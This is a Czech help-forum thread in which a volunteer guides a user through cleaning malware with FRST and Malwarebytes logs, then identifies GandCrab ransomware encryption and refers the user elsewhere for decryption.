Ran by MeGret-TPC (11-11-2018 01:19:08) Run:1
Running from C:\Users\MeGret-TPC\Desktop
Loaded Profiles: MeGret-TPC (Available Profiles: MeGret-TPC)
Boot Mode: Safe Mode (minimal)
==============================================

fixlist content:
*****************
Start

CloseProcesses:
Task: {132D8886-4A07-462A-B824-78AF1B6BF888} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2018-10-14] (Google Inc.)
Task: {6783EA1B-F8CB-4EBD-878B-51DDF41C013A} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2018-10-14] (Google Inc.)
Task: {877C1772-9F30-4BE9-8463-5DF5AA19A3D4} - \Microsoft\Windows\UNP\RunCampaignManager -> No File <==== ATTENTION
FirewallRules: [{CFA12342-5A44-4771-94EA-6913D4D30364}] => (Allow) C:\Users\MeGret-TPC\AppData\Local\kAyeMDseXh.exe
FirewallRules: [{88291374-E8D6-4B34-914C-EA8B2AADE13B}] => (Allow) C:\Users\MeGret-TPC\deiefECnJ.exe
C:\ProgramData\kitot
C:\Users\MeGret-TPC\AppData\Local\Temp
C:\Program Files (x86)\Google\Chrome\Application\winmm.dll
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [601424 2018-07-07] (Oracle Corporation)
HKU\S-1-5-21-819675408-2753461327-3771956256-1001\...\MountPoints2: {0a26cf40-38e2-11e6-9bc2-806e6f6e6963} - "I:\setup.exe"
HKU\S-1-5-21-819675408-2753461327-3771956256-1001\...\MountPoints2: {6faddee6-cef4-11e8-9c3f-806e6f6e6963} - "D:\DVDSetup.exe"
HKU\S-1-5-21-819675408-2753461327-3771956256-1001\...\MountPoints2: {8b1956be-cef6-11e8-9c42-309c23650ed5} - "E:\Lenovo_Suite.exe"
BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_181\bin\ssv.dll => No File
BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_181\bin\jp2ssv.dll => No File
FF Plugin-x32: @java.com/DTPlugin,version=11.181.2 -> C:\Program Files (x86)\Java\jre1.8.0_181\bin\dtplugin\npDeployJava1.dll [No File]
FF Plugin-x32: @java.com/JavaPlugin,version=11.181.2 -> C:\Program Files (x86)\Java\jre1.8.0_181\bin\plugin2\npjp2.dll [No File]
FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll [No File]
FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [No File]
FF Plugin-x32: @videolan.org/vlc,version=2.2.5.1 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [No File]
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll [No File]
CHR StartupUrls: Default -> "hxxps://www.google.com/","hxxp://search.babylon ... XX9VMNAB90"
C:\WINDOWS\System32\Tasks\{B4B9A496-1465-614B-42E6-E9FACFD9FDCB}
C:\WINDOWS\System32\Tasks\{63FF5D84-F332-3C55-1873-E2C6DE6F96AA}
C:\WINDOWS\System32\Tasks\{36E954AC-8F78-691F-B718-D4CE7E4BCF08}
C:\WINDOWS\AutoKMS
C:\WINDOWS\msdownld.tmp
C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineUA
C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineCore
C:\ProgramData\DP45977C.lfl

EmptyTemp:
End
*****************

Processes closed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{132D8886-4A07-462A-B824-78AF1B6BF888}" => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{132D8886-4A07-462A-B824-78AF1B6BF888}" => removed successfully
C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineCore => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\GoogleUpdateTaskMachineCore" => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{6783EA1B-F8CB-4EBD-878B-51DDF41C013A}" => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{6783EA1B-F8CB-4EBD-878B-51DDF41C013A}" => removed successfully
C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineUA => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\GoogleUpdateTaskMachineUA" => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{877C1772-9F30-4BE9-8463-5DF5AA19A3D4}" => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{877C1772-9F30-4BE9-8463-5DF5AA19A3D4}" => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\UNP\RunCampaignManager" => not found
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{CFA12342-5A44-4771-94EA-6913D4D30364}" => removed successfully
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{88291374-E8D6-4B34-914C-EA8B2AADE13B}" => removed successfully
C:\ProgramData\kitot => moved successfully
C:\Users\MeGret-TPC\AppData\Local\Temp => moved successfully
"C:\Program Files (x86)\Google\Chrome\Application\winmm.dll" => not found
"HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\SunJavaUpdateSched" => removed successfully
HKU\S-1-5-21-819675408-2753461327-3771956256-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{0a26cf40-38e2-11e6-9bc2-806e6f6e6963} => removed successfully
HKLM\Software\Classes\CLSID\{0a26cf40-38e2-11e6-9bc2-806e6f6e6963} => not found
HKU\S-1-5-21-819675408-2753461327-3771956256-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{6faddee6-cef4-11e8-9c3f-806e6f6e6963} => removed successfully
HKLM\Software\Classes\CLSID\{6faddee6-cef4-11e8-9c3f-806e6f6e6963} => not found
HKU\S-1-5-21-819675408-2753461327-3771956256-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{8b1956be-cef6-11e8-9c42-309c23650ed5} => removed successfully
HKLM\Software\Classes\CLSID\{8b1956be-cef6-11e8-9c42-309c23650ed5} => not found
HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{761497BB-D6F0-462C-B6EB-D4DAF1D92D43} => removed successfully
HKLM\Software\Wow6432Node\Classes\CLSID\{761497BB-D6F0-462C-B6EB-D4DAF1D92D43} => removed successfully
HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{DBC80044-A445-435b-BC74-9C25C1C588A9} => removed successfully
HKLM\Software\Wow6432Node\Classes\CLSID\{DBC80044-A445-435b-BC74-9C25C1C588A9} => removed successfully
HKLM\Software\Wow6432Node\MozillaPlugins\@java.com/DTPlugin,version=11.181.2 => removed successfully
HKLM\Software\Wow6432Node\MozillaPlugins\@java.com/JavaPlugin,version=11.181.2 => removed successfully
HKLM\Software\Wow6432Node\MozillaPlugins\@nvidia.com/3DVision => removed successfully
HKLM\Software\Wow6432Node\MozillaPlugins\@nvidia.com/3DVisionStreaming => removed successfully
HKLM\Software\Wow6432Node\MozillaPlugins\@videolan.org/vlc,version=2.2.5.1 => removed successfully
HKLM\Software\Wow6432Node\MozillaPlugins\Adobe Reader => removed successfully
"Chrome StartupUrls" => removed successfully
C:\WINDOWS\System32\Tasks\{B4B9A496-1465-614B-42E6-E9FACFD9FDCB} => moved successfully
C:\WINDOWS\System32\Tasks\{63FF5D84-F332-3C55-1873-E2C6DE6F96AA} => moved successfully
C:\WINDOWS\System32\Tasks\{36E954AC-8F78-691F-B718-D4CE7E4BCF08} => moved successfully
C:\WINDOWS\AutoKMS => moved successfully
C:\WINDOWS\msdownld.tmp => moved successfully
"C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineUA" => not found
"C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineCore" => not found
C:\ProgramData\DP45977C.lfl => moved successfully

=========== EmptyTemp: ==========

BITS transfer queue => 7888896 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 17001338 B
Java, Flash, Steam htmlcache => 20052227 B
Windows/system/drivers => 415438 B
Edge => 92673474 B
Chrome => 1085331331 B
Firefox => 760817464 B
Opera => 0 B

Temp, IE cache, history, cookies, recent:
Default => 44570 B
Users => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 0 B
systemprofile32 => 0 B
LocalService => 0 B
LocalService => 0 B
NetworkService => 181950 B
NetworkService => 0 B
MeGret-TPC => 733368813 B

RecycleBin => 11564940 B
EmptyTemp: => 2.5 GB temporary data Removed.

================================

The system needed a reboot.

==== End of Fixlog 01:19:27 ====

Smazáno. Nastala nějaká změna?

Zdravím,stále mi nejdou spouštět exe soubory,fota,videa mají stále ty koncovky toho viru,vyskakují mi samy okna v Google, akorát co jde,,už nemusím do nouzového režimu když chci spustit ten adw...na tom druhém disků to samé

Udělejte kompletní sken MBAM: http://www.malwarebytes.org/mbam.php a dejte log. Předem nic nemažte.

Malwarebytes
www.malwarebytes.com

-Podrobnosti logovacího souboru-
Datum skenování: 11.11.18
Čas skenování: 13:33
Logovací soubor: 05848752-e5ae-11e8-892c-309c23650ed5.json

-Informace o softwaru-
Verze: 3.6.1.2711
Verze komponentů: 1.0.482
Aktualizovat verzi balíku komponent: 1.0.7793
Licence: Zkušební

-Systémová informace-
OS: Windows 10 (Build 17134.165)
CPU: x64
Systém souborů: NTFS
Uživatel: FRNDA\MeGret-TPC

-Shrnutí skenování-
Typ skenování: Skenování hrozeb (Threat Scan)
Spuštění skenování: Ruční
Výsledek: Dokončeno
Skenované objekty: 307119
Zjištěné hrozby: 28
Hrozby umístěné do karantény: 0
Uplynulý čas: 1 min, 6 sek

-Možnosti skenování-
Paměť: Povoleno
Start: Povoleno
Systém souborů: Povoleno
Archivy: Povoleno
Rootkity: Zakázáno
Heuristika: Povoleno
Potenciálně nežádoucí program: Detekovat
Potenciálně nežádoucí modifikace: Detekovat

-Podrobnosti skenování-
Proces: 0
(Nebyly zjištěny žádné škodlivé položky)

Modul: 0
(Nebyly zjištěny žádné škodlivé položky)

Klíč registru: 11
PUP.Optional.SpyHunter, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\SpyHunter5, Žádná uživatelská akce, [3918], [552679],1.0.7793
Spyware.Socelars, HKU\S-1-5-21-819675408-2753461327-3771956256-1001\SOFTWARE\{6D187CC8-35BD-47F6-8760-D406AA1927B1}, Žádná uživatelská akce, [6268], [584328],1.0.7793
Trojan.BitCoinMiner.BatBitRst, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{1EA8098C-25F5-46DE-A412-1C6E1B81EDFC}, Žádná uživatelská akce, [6025], [571190],1.0.7793
Trojan.BitCoinMiner.BatBitRst, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\PLAIN\{1EA8098C-25F5-46DE-A412-1C6E1B81EDFC}, Žádná uživatelská akce, [6025], [571190],1.0.7793
Trojan.BitCoinMiner.BatBitRst, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\{63FF5D84-F332-3C55-1873-E2C6DE6F96AA}, Žádná uživatelská akce, [6025], [571190],1.0.7793
Trojan.BitCoinMiner.BatBitRst, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{0D7125B3-7656-4619-A37A-395D9A914DC0}, Žádná uživatelská akce, [6025], [571190],1.0.7793
Trojan.BitCoinMiner.BatBitRst, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\LOGON\{0D7125B3-7656-4619-A37A-395D9A914DC0}, Žádná uživatelská akce, [6025], [571190],1.0.7793
Trojan.BitCoinMiner.BatBitRst, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\{36E954AC-8F78-691F-B718-D4CE7E4BCF08}, Žádná uživatelská akce, [6025], [571190],1.0.7793
Trojan.StartPage.BatBitRst, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{92146086-56B7-4E0D-9EA3-C78832C285BA}, Žádná uživatelská akce, [14195], [555894],1.0.7793
Trojan.StartPage.BatBitRst, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\PLAIN\{92146086-56B7-4E0D-9EA3-C78832C285BA}, Žádná uživatelská akce, [14195], [555894],1.0.7793
Trojan.StartPage.BatBitRst, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\{B4B9A496-1465-614B-42E6-E9FACFD9FDCB}, Žádná uživatelská akce, [14195], [555894],1.0.7793

Hodnota v registru: 0
(Nebyly zjištěny žádné škodlivé položky)

Data registrů: 0
(Nebyly zjištěny žádné škodlivé položky)

Datové proudy: 0
(Nebyly zjištěny žádné škodlivé položky)

Adresář: 1
Trojan.Agent, C:\PROGRAMDATA\BLOGGER, Žádná uživatelská akce, [402], [552313],1.0.7793

Soubor: 16
PUP.Optional.WiperSoft, C:\USERS\MEGRET-TPC\DESKTOP\WIPERSOFT.LNK, Žádná uživatelská akce, [4418], [340921],1.0.7793
PUP.Optional.SpyHunter, C:\PROGRAM FILES\ENIGMASOFT\SPYHUNTER\SPYHUNTER5.EXE, Žádná uživatelská akce, [3918], [552678],1.0.7793
PUP.Optional.SpyHunter, C:\PROGRAMDATA\ENIGMASOFT LIMITED\SH5_INSTALLER.EXE, Žádná uživatelská akce, [3918], [552679],1.0.7793
Trojan.Agent, C:\PROGRAMDATA\BLOGGER\BLOGGER.EXE, Žádná uživatelská akce, [402], [552313],1.0.7793
PUP.Optional.SpyHunter, C:\PROGRAMDATA\ENIGMASOFT LIMITED\SH5_INSTALLER.EXE, Žádná uživatelská akce, [3918], [552698],1.0.7793
PUP.Optional.WiperSoft, C:\WINDOWS\SYSTEM32\WIPERRM.EXE, Žádná uživatelská akce, [4418], [584847],1.0.7793
PUP.Optional.SpyHunter, C:\USERS\MEGRET-TPC\DOWNLOADS\SPYHUNTER-INSTALLER (2).EXE, Žádná uživatelská akce, [3918], [552698],1.0.7793
PUP.Optional.SpyHunter, C:\USERS\MEGRET-TPC\DOWNLOADS\SPYHUNTER-INSTALLER (1).EXE, Žádná uživatelská akce, [3918], [552698],1.0.7793
Adware.Elex.ShrtCln, C:\USERS\MEGRET-TPC\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Default\Sync Data\SyncData.sqlite3, Žádná uživatelská akce, [260], [454711],1.0.7793
Adware.Elex.ShrtCln, C:\USERS\MEGRET-TPC\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Default\Secure Preferences, Žádná uživatelská akce, [260], [454711],1.0.7793
PUP.Optional.MailRu, C:\USERS\MEGRET-TPC\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Default\Sync Data\SyncData.sqlite3, Žádná uživatelská akce, [243], [454830],1.0.7793
PUP.Optional.MailRu, C:\USERS\MEGRET-TPC\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Default\Web Data, Žádná uživatelská akce, [243], [454830],1.0.7793
PUP.Optional.Babylon, C:\USERS\MEGRET-TPC\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Default\Sync Data\SyncData.sqlite3, Žádná uživatelská akce, [330], [455059],1.0.7793
PUP.Optional.Babylon, C:\USERS\MEGRET-TPC\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Default\Secure Preferences, Žádná uživatelská akce, [330], [455059],1.0.7793
PUP.Optional.SpyHunter, C:\USERS\MEGRET-TPC\DOWNLOADS\SPYHUNTER-INSTALLER (3).EXE, Žádná uživatelská akce, [3918], [552698],1.0.7793
PUP.Optional.WiperSoft, C:\USERS\MEGRET-TPC\DOWNLOADS\WIPERSOFT-INSTALLER.EXE, Žádná uživatelská akce, [4418], [340923],1.0.7793

Fyzický sektor: 0
(Nebyly zjištěny žádné škodlivé položky)

WMI: 0
(Nebyly zjištěny žádné škodlivé položky)

(end)

Smažte všechny nalezené položky a restartujte.

...stale exe,,fotky,,nic,,nejdou otevrit

https://uloz.to/!7FRrzthplMYK/fotky-jpg

https://uloz.to/!ZvwQ6ZvEd6CS/screen-jpg

posilam screeny

Máte v PC tzv. Ransomware, který způsobuje kryptování některých souborů. Vyčistil jsem vám PC od malware a teď je třeba dekryptovat všechny soubory, které byly napadeny. V tom vám ale nepomohu, je k tomu třeba (pokud to vůbec bude možné) přímý vstup do PC. To ale nemá naše fórum právně ošetřeno, takže vám doporučím naše kolegy zde: https://neslape.cz/?utm_campaign=neslap ... ium=banner . Pro příště vám doporučím všechny uložené dokumenty zálohovat.

Něco jsem o tom četl a na YouTube také něco o tom je,,děkuji alespoň za to co jste pro mě udělal a posílám něco finančního na podporu fóra...možná to mám zalohovane na google...mrknu,,ostatní věci bych mohl stáhnout...ještě na tom druhém disků něco bude...zatím to je asi nejhorší co jsem v PC měl,,hlavně přemýšlím odkud se to tam vzalo..pěkná pakárna...

Ransomware řádí asi tak 3roky a je to opravdu to nejhorší v poslední době, nepočítám-li průniky do finančních systémů. Nemáte zač a za příspěvek děkujeme.

VIRY.CZ

GANDCRAB V5.0.4

Re: GANDCRAB V5.0.4

Re: GANDCRAB V5.0.4

Re: GANDCRAB V5.0.4

Re: GANDCRAB V5.0.4

Re: GANDCRAB V5.0.4

Re: GANDCRAB V5.0.4

Re: GANDCRAB V5.0.4

Re: GANDCRAB V5.0.4

Re: GANDCRAB V5.0.4

Re: GANDCRAB V5.0.4

Re: GANDCRAB V5.0.4

Re: GANDCRAB V5.0.4